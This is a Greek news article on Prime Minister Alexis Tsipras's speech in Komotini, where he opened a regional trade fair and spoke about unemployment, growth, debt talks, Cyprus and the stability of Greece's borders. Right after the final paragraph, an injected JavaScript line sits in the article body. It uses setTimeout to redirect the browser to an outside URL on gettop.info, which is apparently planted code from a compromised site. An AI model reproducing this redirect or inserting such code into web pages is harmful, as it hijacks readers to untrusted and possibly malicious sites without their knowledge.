To μήνυμα Τσίπρα από Κομοτηνή: Τα σύνορα είναι σταθερά και αδιαμφισβήτητα

0
8

 

Τη διαβεβαίωση ότι η σημερινή επίσκεψη στη Θράκη δεν είναι πρόσκαιρη, αλλά θα έχει μόνιμο χαρακτήρα, έδωσε από την Κομοτηνή ο πρωθυπουργός, Αλέξης Τσίπρας, ο οποίος εγκαινίασε στην Κομοτηνή την 24η Πανελλήνια Εμπορική Έκθεση «Ανατολική Μακεδονία – Θράκη».

«Θα ήθελα να σας διαβεβαιώσω ότι η σημερινή μας παρουσία δεν θα είναι μια περαστική παρουσία, έρχομαι στη Βόρεια Ελλάδα, εγκαινιάζοντας και το γραφείο της Θεσσαλονίκης του πρωθυπουργού που θα είναι η ματιά του πρωθυπουργικού γραφείου στη Βόρεια Ελλάδα», επισήμανε ο πρωθυπουργός απευθυνόμενος σε εκπροσώπους φορέων και παραγωγικών τάξεων της περιοχής.

Ο Α. Τσίπρας χαρακτήρισε ευτυχή συγκυρία το γεγονός ότι η επίσκεψη στη Θράκη συνέπεσε με τα εγκαίνια της εμπορικής έκθεσης, μιας έκθεσης – που όπως είπε – εδώ και 2,5 δεκαετίες έχει καταστεί θεσμός για την περιοχή, ενώ εξέφρασε την ελπίδα να αποτελέσει στο μέλλον εργαλείο ανάπτυξης που θα στηρίξει τους τοπικούς παραγωγούς και τα προϊόντα της περιοχής. «Στόχος της παρουσίας μας στη Θράκη σήμερα είναι να ενημερωθούμε αδιαμεσολάβητα για τα προβλήματα της περιοχής και τους τρόπους να ενισχύσουμε τον τόπο», ανέφερε.

Ο πρωθυπουργός συμφώνησε με όσα είπε στην προσφώνησή του νωρίτερα ο μητροπολίτης Μαρώνειας – Κομοτηνής Παντελεήμονας, ότι η ανάπτυξη δεν θα πρέπει να είναι μόνο οικονομική, αλλά και πνευματική και πρόσθεσε: «μετά από έξι χρόνια δραματικής ύφεσης και λεηλασίας την έχει ανάγκη η κοινωνία και ο τόπος την ανάπτυξη. Όμως η ανάπτυξη δεν πρέπει να είναι μόνο στατιστικά στοιχεία για τους οικονομολόγους, αλλά πράξεις στην καθημερινότητα των πολιτών. Αυτό που έχει ανάγκη ο τόπος είναι θέσεις εργασίας».

Σε άλλο σημείο της ομιλίας του, ο κ. Τσίπρας υπενθύμισε ότι το 2009 η ανεργία ήταν στο 9% και η σημερινή κυβέρνηση όταν ανέλαβε τη διακυβέρνηση είχε ανέλθει στο 27% και υπογράμμισε ότι στόχος της κυβέρνησης είναι με τη συμπλήρωση της επόμενης πενταετίας, που θα συμπέσει – όπως είπε – και την επέτειο εορτασμού των 200 χρόνων από την απελευθέρωση, να φθάσει σε κανονικά επίπεδα.

«Περιμένουμε τις επόμενες ημέρες να εκπέμψουν πολύ θετικά μηνύματα από το Eurogroup από τη διαπραγμάτευση της χώρας με τους εταίρους και τους ευρωπαϊκούς θεσμούς, μηνύματα που αφορούν στην απομείωση του χρέους που αποτελεί μέρος της δύσκολης συμφωνίας του περασμένου καλοκαιριού την οποία τηρούμε απαρέγκλιτα και τώρα περιμένουμε να τηρηθεί και από τους εταίρους μας», επισήμανε.

Η υφυπουργός Εσωτερικών (Μακεδονίας – Θράκης ) Μαρία Κόλλια Τσαρουχά στο χαιρετισμό που απηύθυνε είπε, μεταξύ άλλων ότι η έκθεση αποτελεί απόδειξη της δυναμικής της Μακεδονίας και της Θράκης ενώ αναφερόμενη στην περιοχή κατηγόρησε τις προηγούμενες κυβερνήσεις, λέγοντας ότι εδώ και δεκαετίες δεν σχεδίασαν, δεν στήριξαν και δεν υλοποίησαν συγκεκριμένα σχέδια για τη Θράκη. «Η παρουσία σας στη Θράκη στέλνει ένα μήνυμα ότι αυτή η περίοδος απομόνωσης τελείωσε», είπε και ζήτησε από τον πρωθυπουργό «η επόμενη ημέρα από την επίσκεψη στη Θράκη να έχει και συνέχεια».

Στο μεταξύ, ο πρόεδρος της ΔΕΘ – Helexpo, Τάσος Τζήκας χαρακτήρισε τιμή για τη Θράκη την παρουσία του πρωθυπουργού στα εγκαίνια της ΔΕΘ και υπενθύμισε ότι είναι ο πρώτος Έλληνας πρωθυπουργός στην 24χρονη ιστορία που εγκαινιάζει την έκθεση. Καταλήγοντας, ευχαρίστησε τον κ. Τσίπρα για τη βοήθειά του για να γίνει η Κίνα τιμώμενη χώρα στη φετινή ΔΕΘ. Μάλιστα, ανακοίνωσε ότι η Helexpo – ΔΕΘ θα προχωρήσει σε συνεργασία με τη μεγάλη εμπορική έκθεση Σεν Τζέν της Κίνας.

Νέος μεγάλος εθνικός στόχος είναι η μείωση της ανεργίας, να φέρουμε δουλειές και εργασία και αυτό περνάει μέσα από τη δίκαιη ανάπτυξη, δήλωσε ο πρωθυπουργός στην Κομοτηνή υπογραμμίζοντας πως η έρευνα και η εκπαίδευση είναι προτεραιότητες για την παραγωγική ανασυγκρότηση.

Η παραγωγική αναβάθμιση του πρωτογενούς τομέας είναι καθοριστικής σημασίας, ανέφερε επισημαίνοντας πως ο τομέας της έρευνας και της καινοτομίας είναι βασικός για τη στήριξη και την αναβάθμιση της τοπικής ανάπτυξης και τα συνεργατικά σχήματα είναι το κλειδί για την ανάπτυξη του αγροτικού τομέα.

Για το κυπριακό ανέφερε πως η Κύπρος δεν χρειάζεται ξένους στρατούς και εγγυητές υπογραμμίζοντας πως η ελπίδα στην Κύπρο δεν μπορεί και δεν πρέπει να χαθεί. Στηρίζουμε τον Πρόεδρο Αναστασιάδη σε αυτή την προσπάθεια. Ο κυπριακός λαός δικαιούται να ζει σε μια επανενωμένη Κύπρο, χωρίς κατοχή και εγγυήσεις.

Τα σύνορα είναι και θα είναι σταθερά και αδιαμφισβήτητα. Τα σύνορα δεν επανακαθορίζονται και τόνισε πως η αμφισβήτηση των διεθνών συνθηκών είναι απαράδεκτη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here